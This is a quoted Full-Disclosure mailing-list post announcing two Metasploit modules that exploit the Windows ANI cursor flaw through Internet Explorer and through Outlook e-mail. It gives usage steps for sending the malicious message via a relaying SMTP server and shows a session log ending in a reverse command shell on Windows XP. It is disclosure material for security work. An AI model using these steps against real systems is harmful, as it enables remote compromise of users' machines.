> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf
> Of H D Moore
> Sent: Monday, April 02, 2007 11:03 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Metasploit vs ANI
>
> Two new exploit modules are available for version 3.0 of the
> Metasploit
> Framework. These modules can be obtained by using the 'Online Update'
> feature in Windows and the 'svn update' command on Unix-like systems.
>
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
>
>
> The two exploits can be viewed in the svn repository at
> metasploit.com:
>
> ndows/browser/ani_loadimage_chunksize.rb
>
> ndows/email/ani_loadimage_chunksize.rb
>
> The first module exploits the ANI flaw through Internet
> Explorer. It uses
> multiple icon files referenced from a single HTML page. This allows
> client-side brute forcing without resorting to javascript.
> This module
> will execute code on Windows 2000, Windows XP, and Windows
> Vista using
> the default target. As mentioned in the blog, a command shell is not
> directly accessible on Vista, but the Meterpreter payload can
> be used to
> bust out of the low-privileged process :-)
>
> The second module exploits the ANI flaw through Outlook and Outlook
> Express. It sends a multipart MIME e-mail that contains
> multiple icons
> files referenced from a HTML message. This allows brute
> forcing of the
> correct target via the mail reader, all without any form of
> client-side
> scripting. To use this module, point RHOST and RPORT at a SMTP server
> that will relay your email. Set the MAILFROM and MAILTO
> options, select a
> payload, launch the exploit, and wait for your payload to execute.
>
> An example session from the e-mail based exploit module:
>
> msf exploit(ani_loadimage_chunksize) > exploit
> [*] Started reverse handler
> [*] Connecting to SMTP server localhost:20025...
> [*] SMTP: 220 slug.metasploit.com ESMTP
> [*] SMTP: 250-slug.metasploit.com
> 250-PIPELINING
> 250-8BITMIME
> 250-AUTH LOGIN PLAIN CRAM-MD5
> 250 SIZE 0
> [*] SMTP: 250 ok
> [*] SMTP: 250 ok
> [*] Sending the message (404759 bytes)...
> [*] SMTP: 354 go ahead
> [*] SMTP: 250 ok 1175497222 qp 12648
> [*] Closing the connection...
> [*] SMTP: 221 slug.metasploit.com
> [*] Waiting for a payload session (backgrounding)...
> [*] Exploit running as background job.
> msf exploit(ani_loadimage_chunksize) >
>
> [*] Command shell session 1 opened (192.168.0.127:4444 ->
> 192.168.0.127:37299)
>
> msf exploit(ani_loadimage_chunksize) > sessions -i 1
> [*] Starting interaction with 1...
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> C:\program files\Outlook Express>
>
> Enjoy!
>
> - The Metasploit Staff
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> Hosted and sponsored by Secunia -
>
